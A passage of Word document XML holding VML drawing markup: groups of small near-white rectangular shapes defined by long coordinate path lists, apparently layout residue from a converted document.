3971,3989,3971,3989,3971,3988,3971,3987,3971,3986,3971,3986,3971,3985,3971,3984,3971,3983,3971,3982,3971,3981,3971,3981,3971,3980,3971,3979,3971,3978,3971,3977,3971,3976,3971,3974,3971,3973,3971,3972,3971,3971,3971,3970,3971,3968,3971,3967,3971,3966,3971,3965,3971,3963,3971,3962,3971,3960,3971,3959,3971,3957,3971,3956,3971,3954,3971,3952,3971,3951,3971,3949,3971,3947,3971,3946,3971,3944,3971,3942,3971,3940,3971,3938,3971,3936,3971,3934,3971,3932,3971,3930,3971,3928,3971,3925,3971,3923,3971,3921,3971,3919,3971,3916,3971,3914,3971,3911,3971,3909,3971,3906,3971,3904,3971,3901,3971,3898,3971,3895,3971,3893,3971,3890,3971,3887,3971,3884,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3971,3881,3970,3881,3970,3881,3970,3881,3970,3881,3970,3881,3970,3881,3970,3881,3969,3881,3969,3881,3969,3881,3969,3881,3968,3881,3968,3881,3968,3881,3967,3881,3967,3881,3966,3881,3966,3881,3966,3881,3965,3881,3965,3881,3964,3881,3963,3881,3963,3881,3962,3881,3961,3881,3961,3881,3960,3881,3959,3881,3958,3881,3957,3881,3956,3881,3955,3881,3954,3881,3953,3881,3952,3881,3951,3881,3950,3881,3948,3881,3947,3881,3946,3881,3944,3881,3943,3881,3941,3881,3940,3881,3938,3881,3937,3881,3935,3881,3933,3881,3931,3881,3929,3881,3927,3881,3925,3881,3923,3881,3921,3881,3919,3881,3917,3881,3914,3881,3912,3881,3910,3881,3907,3881,3905,3881,3902,3881,3899,3881,3896,3881,3893,3881,3891,3881,3888,3881,3884,3881,3881,3881,3878,3881,3875,3881,3871,3881,3868,3881,3864,3881,3861,3881,3857,3881,3853,3881,3849,3881,3845,3881,3841,3881,3837,3881,3833,3881,3829,3881,3824,3881,3820,3881,3815,3881,3810,3881,3806,3881,3801,3881,3796,3881,3791,3881,3786,3881,3780,3881,3775,3881,3769,3881,3764,3881,3758,3881,3753,3881,3747,3881,3741,3881,3735,3881,3729,3881,3722,3881,3716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:349.500pt;margin-top:184.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6990,3690" coordsize="130,270">
        <v:shape style="position:absolute;left:6990;top:3690;width:130;height:270" coordorigin="6990,3690" coordsize="130,270" path="m7003,3716l7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7003,3716,7004,3716,7004,3716,7004,3716,7004,3716,7004,3716,7004,3716,7004,3716,7005,3716,7005,3716,7005,3716,7005,3716,7006,3716,7006,3716,7006,3716,7006,3716,7007,3716,7007,3716,7007,3716,7008,3716,7008,3716,7009,3716,7009,3716,7009,3716,7010,3716,7010,3716,7011,3716,7011,3716,7012,3716,7013,3716,7013,3716,7014,3716,7014,3716,7015,3716,7016,3716,7016,3716,7017,3716,7018,3716,7019,3716,7020,3716,7020,3716,7021,3716,7022,3716,7023,3716,7024,3716,7025,3716,7026,3716,7027,3716,7028,3716,7029,3716,7030,3716,7031,3716,7033,3716,7034,3716,7035,3716,7036,3716,7038,3716,7039,3716,7040,3716,7042,3716,7043,3716,7045,3716,7046,3716,7048,3716,7049,3716,7051,3716,7053,3716,7054,3716,7056,3716,7058,3716,7060,3716,7062,3716,7064,3716,7066,3716,7068,3716,7070,3716,7072,3716,7074,3716,7076,3716,7078,3716,7080,3716,7083,3716,7085,3716,7087,3716,7090,3716,7092,3716,7095,3716,7097,3716,7100,3716,7103,3716,7105,3716,7108,3716,7111,3716,7114,3716,7117,3716,7120,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3717,7123,3717,7123,3717,7123,3717,7123,3717,7123,3717,7123,3718,7123,3718,7123,3718,7123,3719,7123,3719,7123,3719,7123,3720,7123,3720,7123,3720,7123,3721,7123,3721,7123,3722,7123,3722,7123,3723,7123,3724,7123,3724,7123,3725,7123,3726,7123,3726,7123,3727,7123,3728,7123,3729,7123,3730,7123,3731,7123,3732,7123,3733,7123,3734,7123,3735,7123,3736,7123,3737,7123,3738,7123,3740,7123,3741,7123,3742,7123,3744,7123,3745,7123,3747,7123,3749,7123,3750,7123,3752,7123,3754,7123,3756,7123,3757,7123,3759,7123,3761,7123,3763,7123,3766,7123,3768,7123,3770,7123,3772,7123,3775,7123,3777,7123,3780,7123,3782,7123,3785,7123,3788,7123,3791,7123,3793,7123,3796,7123,3799,7123,3802,7123,3806,7123,3809,7123,3812,7123,3816,7123,3819,7123,3823,7123,3826,7123,3830,7123,3834,7123,3838,7123,3842,7123,3846,7123,3850,7123,3854,7123,3858,7123,3863,7123,3867,7123,3872,7123,3877,7123,3881,7123,3886,7123,3891,7123,3896,7123,3901,7123,3907,7123,3912,7123,3917,7123,3923,7123,3929,7123,3934,7123,3940,7123,3946,7123,3952,7123,3958,7123,3965,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7122,3971,7121,3971,7121,3971,7121,3971,7121,3971,7121,3971,7121,3971,7120,3971,7120,3971,7120,3971,7120,3971,7120,3971,7119,3971,7119,3971,7119,3971,7118,3971,7118,3971,7118,3971,7117,3971,7117,3971,7117,3971,7116,3971,7116,3971,7115,3971,7115,3971,7114,3971,7114,3971,7113,3971,7113,3971,7112,3971,7111,3971,7111,3971,7110,3971,7109,3971,7109,3971,7108,3971,7107,3971,7106,3971,7106,3971,7105,3971,7104,3971,7103,3971,7102,3971,7101,3971,7100,3971,7099,3971,7098,3971,7097,3971,7096,3971,7095,3971,7094,3971,7093,3971,7091,3971,7090,3971,7089,3971,7087,3971,7086,3971,7085,3971,7083,3971,7082,3971,7080,3971,7079,3971,7077,3971,7076,3971,7074,3971,7072,3971,7071,3971,7069,3971,7067,3971,7065,3971,7063,3971,7062,3971,7060,3971,7058,3971,7056,3971,7053,3971,7051,3971,7049,3971,7047,3971,7045,3971,7042,3971,7040,3971,7038,3971,7035,3971,7033,3971,7030,3971,7028,3971,7025,3971,7022,3971,7020,3971,7017,3971,7014,3971,7011,3971,7008,3971,7006,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3971,7003,3970,7003,3970,7003,3970,7003,3970,7003,3970,7003,3970,7003,3970,7003,3969,7003,3969,7003,3969,7003,3969,7003,3968,7003,3968,7003,3968,7003,3967,7003,3967,7003,3966,7003,3966,7003,3966,7003,3965,7003,3965,7003,3964,7003,3963,7003,3963,7003,3962,7003,3961,7003,3961,7003,3960,7003,3959,7003,3958,7003,3957,7003,3956,7003,3955,7003,3954,7003,3953,7003,3952,7003,3951,7003,3950,7003,3948,7003,3947,7003,3946,7003,3944,7003,3943,7003,3941,7003,3940,7003,3938,7003,3937,7003,3935,7003,3933,7003,3931,7003,3929,7003,3927,7003,3925,7003,3923,7003,3921,7003,3919,7003,3917,7003,3914,7003,3912,7003,3910,7003,3907,7003,3905,7003,3902,7003,3899,7003,3896,7003,3893,7003,3891,7003,3888,7003,3884,7003,3881,7003,3878,7003,3875,7003,3871,7003,3868,7003,3864,7003,3861,7003,3857,7003,3853,7003,3849,7003,3845,7003,3841,7003,3837,7003,3833,7003,3829,7003,3824,7003,3820,7003,3815,7003,3810,7003,3806,7003,3801,7003,3796,7003,3791,7003,3786,7003,3780,7003,3775,7003,3769,7003,3764,7003,3758,7003,3753,7003,3747,7003,3741,7003,3735,7003,3729,7003,3722,7003,3716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:184.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,3690" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:3690;width:130;height:270" coordorigin="7110,3690" coordsize="130,270" path="m7123,3716l7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7123,3716,7124,3716,7124,3716,7124,3716,7124,3716,7124,3716,7124,3716,7125,3716,7125,3716,7125,3716,7125,3716,7125,3716,7126,3716,7126,3716,7126,3716,7126,3716,7127,3716,7127,3716,7127,3716,7128,3716,7128,3716,7129,3716,7129,3716,7130,3716,7130,3716,7130,3716,7131,3716,7131,3716,7132,3716,7133,3716,7133,3716,7134,3716,7134,3716,7135,3716,7136,3716,7136,3716,7137,3716,7138,3716,7139,3716,7140,3716,7140,3716,7141,3716,7142,3716,7143,3716,7144,3716,7145,3716,7146,3716,7147,3716,7148,3716,7149,3716,7150,3716,7151,3716,7153,3716,7154,3716,7155,3716,7156,3716,7158,3716,7159,3716,7160,3716,7162,3716,7163,3716,7165,3716,7166,3716,7168,3716,7170,3716,7171,3716,7173,3716,7175,3716,7176,3716,7178,3716,7180,3716,7182,3716,7184,3716,7186,3716,7188,3716,7190,3716,7192,3716,7194,3716,7196,3716,7198,3716,7200,3716,7203,3716,7205,3716,7207,3716,7210,3716,7212,3716,7215,3716,7217,3716,7220,3716,7223,3716,7225,3716,7228,3716,7231,3716,7234,3716,7237,3716,7240,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3716,7243,3717,7243,3717,7243,3717,7243,3717,7243,3717,7243,3717,7243,3718,7243,3718,7243,3718,7243,3719,7243,3719,7243,3719,7243,3720,7243,3720,7243,3720,7243,3721,7243,3721,7243,3722,7243,3722,7243,3723,7243,3724,7243,3724,7243,3725,7243,3726,7243,3726,7243,3727,7243,3728,7243,3729,7243,3730,7243,3731,7243,3732,7243,3733,7243,3734,7243,3735,7243,3736,7243,3737,7243,3738,7243,3740,7243,3741,7243,3742,7243,3744,7243,3745,7243,3747,7243,3749,7243,3750,7243,3752,7243,3754,7243,3756,7243,3757,7243,3759,7243,3761,7243,3763,7243,3766,7243,3768,7243,3770,7243,3772,7243,3775,7243,3777,7243,3780,7243,3782,7243,3785,7243,3788,7243,3791,7243,3793,7243,3796,7243,3799,7243,3802,7243,3806,7243,3809,7243,3812,7243,3816,7243,3819,7243,3823,7243,3826,7243,3830,7243,3834,7243,3838,7243,3842,7243,3846,7243,3850,7243,3854,7243,3858,7243,3863,7243,3867,7243,3872,7243,3877,7243,3881,7243,3886,7243,3891,7243,3896,7243,3901,7243,3907,7243,3912,7243,3917,7243,3923,7243,3929,7243,3934,7243,3940,7243,3946,7243,3952,7243,3958,7243,3965,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7243,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7242,3971,7241,3971,7241,3971,7241,3971,7241,3971,7241,3971,7241,3971,7240,3971,7240,3971,7240,3971,7240,3971,7239,3971,7239,3971,7239,3971,7238,3971,7238,3971,7238,3971,7237,3971,7237,3971,7237,3971,7236,3971,7236,3971,7235,3971,7235,3971,7234,3971,7234,3971,7233,3971,7233,3971,7232,3971,7231,3971,7231,3971,7230,3971,7229,3971,7229,3971,7228,3971,7227,3971,7226,3971,7226,3971,7225,3971,7224,3971,7223,3971,7222,3971,7221,3971,7220,3971,7219,3971,7218,3971,7217,3971,7216,3971,7215,3971,7214,3971,7213,3971,7211,3971,7210,3971,7209,3971,7208,3971,7206,3971,7205,3971,7203,3971,7202,3971,7200,3971,7199,3971,7197,3971,7196,3971,7194,3971,7192,3971,7191,3971,7189,3971,7187,3971,7185,3971,7183,3971,7182,3971,7180,3971,7178,3971,7176,3971,7174,3971,7171,3971,7169,3971,7167,3971,7165,3971,7163,3971,7160,3971,7158,3971,7155,3971,7153,3971,7150,3971,7148,3971,7145,3971,7143,3971,7140,3971,7137,3971,7134,3971,7131,3971,7129,3971,7126,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3971,7123,3970,7123,3970,7123,3970,7123,3970,7123,3970,7123,3970,7123,3970,7123,3969,7123,3969,7123,3969,7123,3969,7123,3968,7123,3968,7123,3968,7123,3967,7123,3967,7123,3966,7123,3966,7123,3966,7123,3965,7123,3965,7123,3964,7123,3963,7123,3963,7123,3962,7123,3961,7123,3961,7123,3960,7123,3959,7123,3958,7123,3957,7123,3956,7123,3955,7123,3954,7123,3953,7123,3952,7123,3951,7123,3950,7123,3948,7123,3947,7123,3946,7123,3944,7123,3943,7123,3941,7123,3940,7123,3938,7123,3937,7123,3935,7123,3933,7123,3931,7123,3929,7123,3927,7123,3925,7123,3923,7123,3921,7123,3919,7123,3917,7123,3914,7123,3912,7123,3910,7123,3907,7123,3905,7123,3902,7123,3899,7123,3896,7123,3893,7123,3891,7123,3888,7123,3884,7123,3881,7123,3878,7123,3875,7123,3871,7123,3868,7123,3864,7123,3861,7123,3857,7123,3853,7123,3849,7123,3845,7123,3841,7123,3837,7123,3833,7123,3829,7123,3824,7123,3820,7123,3815,7123,3810,7123,3806,7123,3801,7123,3796,7123,3791,7123,3786,7123,3780,7123,3775,7123,3769,7123,3764,7123,3758,7123,3753,7123,3747,7123,3741,7123,3735,7123,3729,7123,3722,7123,3716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:4510;width:130;height:270" coordorigin="2670,4510" coordsize="130,270" path="m2680,4526l2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2680,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2681,4526,2682,4526,2682,4526,2682,4526,2682,4526,2682,4526,2682,4526,2683,4526,2683,4526,2683,4526,2683,4526,2684,4526,2684,4526,2684,4526,2685,4526,2685,4526,2685,4526,2686,4526,2686,4526,2686,4526,2687,4526,2687,4526,2688,4526,2688,4526,2689,4526,2689,4526,2690,4526,2690,4526,2691,4526,2692,4526,2692,4526,2693,4526,2694,4526,2694,4526,2695,4526,2696,4526,2697,4526,2697,4526,2698,4526,2699,4526,2700,4526,2701,4526,2702,4526,2703,4526,2704,4526,2705,4526,2706,4526,2707,4526,2708,4526,2709,4526,2710,4526,2712,4526,2713,4526,2714,4526,2715,4526,2717,4526,2718,4526,2720,4526,2721,4526,2723,4526,2724,4526,2726,4526,2727,4526,2729,4526,2731,4526,2732,4526,2734,4526,2736,4526,2738,4526,2740,4526,2741,4526,2743,4526,2745,4526,2747,4526,2749,4526,2752,4526,2754,4526,2756,4526,2758,4526,2760,4526,2763,4526,2765,4526,2768,4526,2770,4526,2773,4526,2775,4526,2778,4526,2780,4526,2783,4526,2786,4526,2789,4526,2792,4526,2794,4526,2797,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4527,2800,4527,2800,4527,2800,4527,2800,4527,2800,4527,2800,4527,2800,4527,2800,4527,2800,4528,2800,4528,2800,4528,2800,4528,2800,4529,2800,4529,2800,4529,2800,4530,2800,4530,2800,4530,2800,4531,2800,4531,2800,4532,2800,4532,2800,4533,2800,4533,2800,4534,2800,4535,2800,4535,2800,4536,2800,4537,2800,4537,2800,4538,2800,4539,2800,4540,2800,4541,2800,4542,2800,4543,2800,4544,2800,4545,2800,4546,2800,4548,2800,4549,2800,4550,2800,4551,2800,4553,2800,4554,2800,4556,2800,4557,2800,4559,2800,4561,2800,4562,2800,4564,2800,4566,2800,4568,2800,4570,2800,4572,2800,4574,2800,4576,2800,4578,2800,4580,2800,4583,2800,4585,2800,4588,2800,4590,2800,4593,2800,4595,2800,4598,2800,4601,2800,4604,2800,4607,2800,4610,2800,4613,2800,4616,2800,4619,2800,4623,2800,4626,2800,4629,2800,4633,2800,4637,2800,4640,2800,4644,2800,4648,2800,4652,2800,4656,2800,4660,2800,4664,2800,4669,2800,4673,2800,4678,2800,4682,2800,4687,2800,4692,2800,4697,2800,4702,2800,4707,2800,4712,2800,4717,2800,4722,2800,4728,2800,4733,2800,4739,2800,4745,2800,4751,2800,4757,2800,4763,2800,4769,2800,4775,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2799,4781,2799,4781,2799,4781,2799,4781,2799,4781,2799,4781,2798,4781,2798,4781,2798,4781,2798,4781,2798,4781,2797,4781,2797,4781,2797,4781,2797,4781,2796,4781,2796,4781,2795,4781,2795,4781,2795,4781,2794,4781,2794,4781,2793,4781,2793,4781,2793,4781,2792,4781,2792,4781,2791,4781,2790,4781,2790,4781,2789,4781,2789,4781,2788,4781,2787,4781,2787,4781,2786,4781,2785,4781,2784,4781,2783,4781,2783,4781,2782,4781,2781,4781,2780,4781,2779,4781,2778,4781,2777,4781,2776,4781,2775,4781,2774,4781,2773,4781,2772,4781,2770,4781,2769,4781,2768,4781,2767,4781,2765,4781,2764,4781,2763,4781,2761,4781,2760,4781,2758,4781,2757,4781,2755,4781,2753,4781,2752,4781,2750,4781,2748,4781,2747,4781,2745,4781,2743,4781,2741,4781,2739,4781,2737,4781,2735,4781,2733,4781,2731,4781,2729,4781,2727,4781,2725,4781,2723,4781,2720,4781,2718,4781,2716,4781,2713,4781,2711,4781,2708,4781,2706,4781,2703,4781,2700,4781,2698,4781,2695,4781,2692,4781,2689,4781,2686,4781,2683,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4781,2680,4780,2680,4780,2680,4780,2680,4780,2680,4780,2680,4779,2680,4779,2680,4779,2680,4778,2680,4778,2680,4778,2680,4777,2680,4777,2680,4776,2680,4776,2680,4775,2680,4775,2680,4774,2680,4774,2680,4773,2680,4772,2680,4772,2680,4771,2680,4770,2680,4769,2680,4769,2680,4768,2680,4767,2680,4766,2680,4765,2680,4764,2680,4762,2680,4761,2680,4760,2680,4759,2680,4758,2680,4756,2680,4755,2680,4753,2680,4752,2680,4750,2680,4749,2680,4747,2680,4745,2680,4744,2680,4742,2680,4740,2680,4738,2680,4736,2680,4734,2680,4732,2680,4729,2680,4727,2680,4725,2680,4723,2680,4720,2680,4718,2680,4715,2680,4712,2680,4710,2680,4707,2680,4704,2680,4701,2680,4698,2680,4695,2680,4692,2680,4688,2680,4685,2680,4682,2680,4678,2680,4675,2680,4671,2680,4667,2680,4664,2680,4660,2680,4656,2680,4652,2680,4647,2680,4643,2680,4639,2680,4635,2680,4630,2680,4625,2680,4621,2680,4616,2680,4611,2680,4606,2680,4601,2680,4596,2680,4591,2680,4585,2680,4580,2680,4574,2680,4569,2680,4563,2680,4557,2680,4551,2680,4545,2680,4539,2680,4533,2680,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:4510;width:130;height:270" coordorigin="2790,4510" coordsize="130,270" path="m2800,4526l2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2800,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2801,4526,2802,4526,2802,4526,2802,4526,2802,4526,2802,4526,2802,4526,2803,4526,2803,4526,2803,4526,2803,4526,2803,4526,2804,4526,2804,4526,2804,4526,2805,4526,2805,4526,2805,4526,2806,4526,2806,4526,2806,4526,2807,4526,2807,4526,2808,4526,2808,4526,2809,4526,2809,4526,2810,4526,2810,4526,2811,4526,2812,4526,2812,4526,2813,4526,2814,4526,2814,4526,2815,4526,2816,4526,2817,4526,2817,4526,2818,4526,2819,4526,2820,4526,2821,4526,2822,4526,2823,4526,2824,4526,2825,4526,2826,4526,2827,4526,2828,4526,2829,4526,2830,4526,2832,4526,2833,4526,2834,4526,2836,4526,2837,4526,2838,4526,2840,4526,2841,4526,2843,4526,2844,4526,2846,4526,2847,4526,2849,4526,2851,4526,2852,4526,2854,4526,2856,4526,2858,4526,2860,4526,2861,4526,2863,4526,2865,4526,2867,4526,2870,4526,2872,4526,2874,4526,2876,4526,2878,4526,2881,4526,2883,4526,2885,4526,2888,4526,2890,4526,2893,4526,2895,4526,2898,4526,2901,4526,2903,4526,2906,4526,2909,4526,2912,4526,2915,4526,2917,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4526,2920,4527,2920,4527,2920,4527,2920,4527,2920,4527,2920,4527,2920,4527,2920,4527,2920,4527,2920,4528,2920,4528,2920,4528,2920,4528,2920,4529,2920,4529,2920,4529,2920,4530,2920,4530,2920,4530,2920,4531,2920,4531,2920,4532,2920,4532,2920,4533,2920,4533,2920,4534,2920,4535,2920,4535,2920,4536,2920,4537,2920,4537,2920,4538,2920,4539,2920,4540,2920,4541,2920,4542,2920,4543,2920,4544,2920,4545,2920,4546,2920,4548,2920,4549,2920,4550,2920,4551,2920,4553,2920,4554,2920,4556,2920,4557,2920,4559,2920,4561,2920,4562,2920,4564,2920,4566,2920,4568,2920,4570,2920,4572,2920,4574,2920,4576,2920,4578,2920,4580,2920,4583,2920,4585,2920,4588,2920,4590,2920,4593,2920,4595,2920,4598,2920,4601,2920,4604,2920,4607,2920,4610,2920,4613,2920,4616,2920,4619,2920,4623,2920,4626,2920,4629,2920,4633,2920,4637,2920,4640,2920,4644,2920,4648,2920,4652,2920,4656,2920,4660,2920,4664,2920,4669,2920,4673,2920,4678,2920,4682,2920,4687,2920,4692,2920,4697,2920,4702,2920,4707,2920,4712,2920,4717,2920,4722,2920,4728,2920,4733,2920,4739,2920,4745,2920,4751,2920,4757,2920,4763,2920,4769,2920,4775,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2920,4781,2919,4781,2919,4781,2919,4781,2919,4781,2919,4781,2919,4781,2919,4781,2918,4781,2918,4781,2918,4781,2918,4781,2917,4781,2917,4781,2917,4781,2917,4781,2916,4781,2916,4781,2916,4781,2915,4781,2915,4781,2914,4781,2914,4781,2914,4781,2913,4781,2913,4781,2912,4781,2912,4781,2911,4781,2910,4781,2910,4781,2909,4781,2909,4781,2908,4781,2907,4781,2907,4781,2906,4781,2905,4781,2904,4781,2903,4781,2903,4781,2902,4781,2901,4781,2900,4781,2899,4781,2898,4781,2897,4781,2896,4781,2895,4781,2894,4781,2893,4781,2892,4781,2890,4781,2889,4781,2888,4781,2887,4781,2885,4781,2884,4781,2883,4781,2881,4781,2880,4781,2878,4781,2877,4781,2875,4781,2874,4781,2872,4781,2870,4781,2869,4781,2867,4781,2865,4781,2863,4781,2861,4781,2859,4781,2857,4781,2855,4781,2853,4781,2851,4781,2849,4781,2847,4781,2845,4781,2843,4781,2840,4781,2838,4781,2836,4781,2833,4781,2831,4781,2828,4781,2826,4781,2823,4781,2820,4781,2818,4781,2815,4781,2812,4781,2809,4781,2806,4781,2803,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4781,2800,4780,2800,4780,2800,4780,2800,4780,2800,4780,2800,4779,2800,4779,2800,4779,2800,4778,2800,4778,2800,4778,2800,4777,2800,4777,2800,4776,2800,4776,2800,4775,2800,4775,2800,4774,2800,4774,2800,4773,2800,4772,2800,4772,2800,4771,2800,4770,2800,4769,2800,4769,2800,4768,2800,4767,2800,4766,2800,4765,2800,4764,2800,4762,2800,4761,2800,4760,2800,4759,2800,4758,2800,4756,2800,4755,2800,4753,2800,4752,2800,4750,2800,4749,2800,4747,2800,4745,2800,4744,2800,4742,2800,4740,2800,4738,2800,4736,2800,4734,2800,4732,2800,4729,2800,4727,2800,4725,2800,4723,2800,4720,2800,4718,2800,4715,2800,4712,2800,4710,2800,4707,2800,4704,2800,4701,2800,4698,2800,4695,2800,4692,2800,4688,2800,4685,2800,4682,2800,4678,2800,4675,2800,4671,2800,4667,2800,4664,2800,4660,2800,4656,2800,4652,2800,4647,2800,4643,2800,4639,2800,4635,2800,4630,2800,4625,2800,4621,2800,4616,2800,4611,2800,4606,2800,4601,2800,4596,2800,4591,2800,4585,2800,4580,2800,4574,2800,4569,2800,4563,2800,4557,2800,4551,2800,4545,2800,4539,2800,4533,2800,4526e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:259.500pt;margin-top:225.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5190,4510" coordsize="130,270">
        <v:shape style="position:absolute;left:5190;top:4510;width:130;height:270" coordorigin="5190,4510" coordsize="130,270" path="m5202,4526l5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5202,4526,5203,4526,5203,4526,5203,4526,5203,4526,5203,4526,5203,4526,5204,4526,5204,4526,5204,4526,5204,4526,5204,4526,5205,4526,5205,4526,5205,4526,5206,4526,5206,4526,5206,4526,5207,4526,5207,4526,5207,4526,5208,4526,5208,4526,5209,4526,5209,4526,5209,4526,5210,4526,5211,4526,5211,4526,5212,4526,5212,4526,5213,4526,5213,4526,5214,4526,5215,4526,5216,4526,5216,4526,5217,4526,5218,4526,5219,4526,5219,4526,5220,4526,5221,4526,5222,4526,5223,4526,5224,4526,5225,4526,5226,4526,5227,4526,5228,4526,5229,4526,5230,4526,5232,4526,5233,4526,5234,4526,5235,4526,5237,4526,5238,4526,5239,4526,5241,4526,5242,4526,5244,4526,5245,4526,5247,4526,5249,4526,5250,4526,5252,4526,5254,4526,5255,4526,5257,4526,5259,4526,5261,4526,5263,4526,5265,4526,5267,4526,5269,4526,5271,4526,5273,4526,5275,4526,5277,4526,5279,4526,5282,4526,5284,4526,5286,4526,5289,4526,5291,4526,5294,4526,5296,4526,5299,4526,5302,4526,5304,4526,5307,4526,5310,4526,5313,4526,5316,4526,5319,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4526,5322,4527,5322,4527,5322,4527,5322,4527,5322,4527,5322,4527,5322,4527,5322,4527,5322,4527,5322,4528,5322,4528,5322,4528,5322,4528,5322,4529,5322,4529,5322,4529,5322,4530,5322,4530,5322,4530,5322,4531,5322,4531,5322,4532,5322,4532,5322,4533,5322,4533,5322,4534,5322,4535,5322,4535,5322,4536,5322,4537,5322,4537,5322,4538,5322,4539,5322,4540,5322,4541,5322,4542,5322,4543,5322,4544,5322,4545,5322,4546,5322,4548,5322,4549,5322,4550,5322,4551,5322,4553,5322,4554,5322,4556,5322,4557,5322,4559,5322,4561,5322,4562,5322,4564,5322,4566,5322,4568,5322,4570,5322,4572,5322,4574,5322,4576,5322,4578,5322,4580,5322,4583,5322,4585,5322,4588,5322,4590,5